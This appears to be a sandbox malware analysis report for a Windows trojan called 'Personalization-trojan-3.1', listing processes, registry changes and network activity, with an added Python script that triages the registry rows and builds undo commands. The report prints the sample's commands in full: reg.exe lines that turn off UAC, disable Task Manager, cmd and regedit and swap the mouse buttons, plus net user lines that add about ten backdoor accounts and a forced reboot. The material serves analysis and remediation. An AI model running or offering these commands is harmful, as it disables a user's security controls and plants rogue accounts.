cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\guest.png

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

90s

Max time network

81s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2736 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2736 wrote to memory of 4232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.bat"

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\notepad.exe

notepad sources\URDED.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

134s

Max time network

135s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\taskmgr.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

137s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\6E6A.tmp\6E6B.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\msiexec.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\6E69.tmp\6E6A.tmp\6E6B.bat

MD5 4c46c91a5d1a43115e11db625f322414
SHA1 53c015fe4cf56784db8eaf28048d4cfae09ffa86
SHA256 91e88cdab236b8221194160b904c63899baac408596725153245ca8f39c29524
SHA512 a30ee881c718c2a90b5563f58dca470da353d5e3b7b1e74b0f0c777dd05adafc357a4363a1a0814b6889378c0f37d02e742ab2542f5ec18b3ffd5518285ecfda

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

104s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" C:\Windows\system32\reg.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
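
Of the registry writes in the tables above, only the reg.exe rows are the sample's own work: EnableLUA=0 turns UAC off after the next restart, DisableRegistryTools=1 locks the user out of regedit, and the Wallpaper value is the defacement. The LogonUI.exe rows under HKEY_USERS\.DEFAULT are accent and DWM colour values the logon screen writes when the session ends (shutdown.exe appears with SeShutdownPrivilege in this same analysis), so the "Modifies data under HKEY_USERS" signature is noise here. The Python below is an added example, not code from the sandbox or the sample: it parses signature rows in the exact layout printed in this report, separates the policy changes from the logon-screen writes, and produces the reg.exe commands that undo the policy values. The restored defaults (EnableLUA 1, ConsentPromptBehaviorAdmin 5) are Windows defaults; the ConsentPromptBehaviorAdmin rule is an addition, DisableTaskMgr is named by the "Disables Task Manager" signature without an indicator row, and SAMPLE_ROWS are copied from this report.

```python
r"""Triage of the registry rows in the signature tables of this analysis.

Added example, not code from the sandbox or the sample. Rows are parsed in
the layout printed here:
  Set value (type) \REGISTRY\... = "data" <process> <target>
  Key created \REGISTRY\... <process> <target>
"""
from __future__ import annotations

import re
from dataclasses import dataclass

ROW_RE = re.compile(
    r'^(?P<op>Set value|Key created)(?: \((?P<type>\w+)\))?'
    r' (?P<path>\\REGISTRY\\.+?)(?: = (?P<data>"[^"]*"|\S+))?'
    r' (?P<process>\S+) (?P<target>\S+)$'
)
POLICY_KEY = r"\software\microsoft\windows\currentversion\policies\system"
# value name -> (data the sample sets, ATT&CK tag, Windows default to restore;
# None means the value does not exist by default and is deleted instead)
POLICY_VALUES = {
    "enablelua": ("0", "T1548.002", "1"),
    "consentpromptbehavioradmin": ("0", "T1548.002", "5"),   # added rule
    "disableregistrytools": ("1", "T1562.001", None),
    "disabletaskmgr": ("1", "T1562.001", None),
}
HIVES = (("\\REGISTRY\\MACHINE\\", "HKLM\\"), ("\\REGISTRY\\USER\\", "HKU\\"))


@dataclass(frozen=True)
class RegWrite:
    op: str
    vtype: str | None
    path: str          # NT object path; key plus value name for "Set value"
    data: str | None
    process: str

    @property
    def key(self) -> str:
        return self.path.rsplit("\\", 1)[0]

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[1]


@dataclass(frozen=True)
class Verdict:
    tag: str           # ATT&CK technique ID, "benign" or "unclassified"
    note: str
    undo: str | None   # reg.exe command that reverses the write, when known


def parse_row(row: str) -> RegWrite | None:
    """Parse one printed signature row; None if it is not a registry row."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    data = m["data"].strip('"') if m["data"] else None
    return RegWrite(m["op"], m["type"], m["path"], data, m["process"])


def to_reg_path(nt_path: str) -> str:
    """Map the NT object path of a key to the HKLM\\ or HKU\\ form reg.exe takes."""
    for prefix, hive in HIVES:
        if nt_path.upper().startswith(prefix):
            return hive + nt_path[len(prefix):]
    return nt_path


def triage(w: RegWrite) -> Verdict:
    """Classify one write and, for the policy values, say how to undo it."""
    path_l = w.path.lower()
    proc = w.process.rsplit("\\", 1)[-1].lower()
    if w.op == "Set value" and w.key.lower().endswith(POLICY_KEY):
        rule = POLICY_VALUES.get(w.name.lower())
        if rule and w.data == rule[0]:
            _, tag, default = rule
            key = to_reg_path(w.key)
            undo = (f'reg add "{key}" /v {w.name} /t REG_DWORD /d {default} /f' if default
                    else f'reg delete "{key}" /v {w.name} /f')
            return Verdict(tag, f"{w.name}={w.data} set by {proc}", undo)
    if w.op == "Set value" and path_l.endswith(r"\control panel\desktop\wallpaper"):
        return Verdict("T1491.001", f"wallpaper set to {w.data} by {proc}", None)
    if proc == "logonui.exe" and "\\.default\\" in path_l:
        return Verdict("benign", "logon-screen theming written by LogonUI.exe", None)
    return Verdict("unclassified", f"{w.op} {w.path} by {proc}", None)


def undo_commands(rows: list[str]) -> list[str]:
    """reg.exe commands (run elevated) that reverse the policy changes in rows."""
    out = []
    for row in rows:
        w = parse_row(row)
        if w and (v := triage(w)).undo:
            out.append(v.undo)
    return out


# Copied from the signature tables of this analysis.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" C:\Windows\system32\reg.exe N/A',
    r'Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A',
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        w = parse_row(row)
        v = triage(w)
        print(f"{v.tag:12} {v.note}")
    print("\n".join(undo_commands(SAMPLE_ROWS)))
```

The undo commands only cover the policy values; the wallpaper has no known-good value to restore, and EnableLUA takes effect on the next restart, so a host that has already rebooted since infection ran without UAC in the meantime.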

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4964 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe C:\Windows\system32\cmd.exe
PID 4964 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe C:\Windows\system32\cmd.exe
PID 316 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 316 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 316 wrote to memory of 4708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 316 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4556 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4556 wrote to memory of 4428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2320 wrote to memory of 3736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2320 wrote to memory of 3736 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2276 wrote to memory of 2096 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2276 wrote to memory of 2096 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2928 wrote to memory of 1684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2928 wrote to memory of 1684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 352 wrote to memory of 2956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 352 wrote to memory of 2956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1516 wrote to memory of 2792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 2792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2064 wrote to memory of 4324 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2064 wrote to memory of 4324 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1656 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1656 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 3588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3588 wrote to memory of 4872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3588 wrote to memory of 4872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 316 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4272 wrote to memory of 3620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4272 wrote to memory of 3620 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 316 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 316 wrote to memory of 4260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe

"C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6A91.tmp\6A92.tmp\6A93.bat C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\personalize.exe"

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\net.exe

net user /add NTCUS ntcus123

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTCUS ntcus123

C:\Windows\system32\net.exe

net user /add NTUSER ntcus124

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTUSER ntcus124

C:\Windows\system32\net.exe

net user /add NTDAT ntpersonalize

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTDAT ntpersonalize

C:\Windows\system32\net.exe

net user /add DC discord

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add DC discord

C:\Windows\system32\net.exe

net user /add cfs belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add cfs belgium

C:\Windows\system32\net.exe

net user /add leopoldII belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add leopoldII belgium

C:\Windows\system32\net.exe

net user /add SCHJIEAB rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SCHJIEAB rykn

C:\Windows\system32\net.exe

net user /add IZWYOKWYIEN rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn

C:\Windows\system32\net.exe

net user /add asap asap

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add asap asap

C:\Windows\system32\net.exe

net user /add REICHTANGLE ig1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add REICHTANGLE ig1

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f

C:\Windows\system32\shutdown.exe

shutdown /r /t 3 /c "XAXAXA"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3aea855 /state1:0x41c64e6d

Network

Country  Destination       Domain                       Proto
US       20.231.121.79:80                               tcp
US       8.8.8.8:53        23.236.111.52.in-addr.arpa   udp
US       8.8.8.8:53                                     udp

Files

C:\Users\Admin\AppData\Local\Temp\6A91.tmp\6A92.tmp\6A93.bat

MD5 7c9274396b81ebfe6570c3b6b962e91c
SHA1 d1768cf3a09cc3d652ae71fde70fc76d5c472b90
SHA256 c5c3916b24fb9aaeb3347e28d3f5ff555b06b4c631fcd779c57cdbac31c83f89
SHA512 a01a9db207e652a678d45919d306f2068fa6691fe8ed7e8d800f76c9fb9598b739926333283da7dfee187f4a7d57964075b1b8c90739057136b930791956cae3

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-19 12:13

Reported

2024-06-19 12:16

Platform

win10-20240404-en

Max time kernel

135s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Personalization-trojan-3.1\user.png

Network

Country  Destination  Domain                         Proto
US       8.8.8.8:53   30.243.111.52.in-addr.arpa     udp
US       8.8.8.8:53   172.214.232.199.in-addr.arpa   udp
US       8.8.8.8:53   12.173.189.20.in-addr.arpa     udp

Files

N/A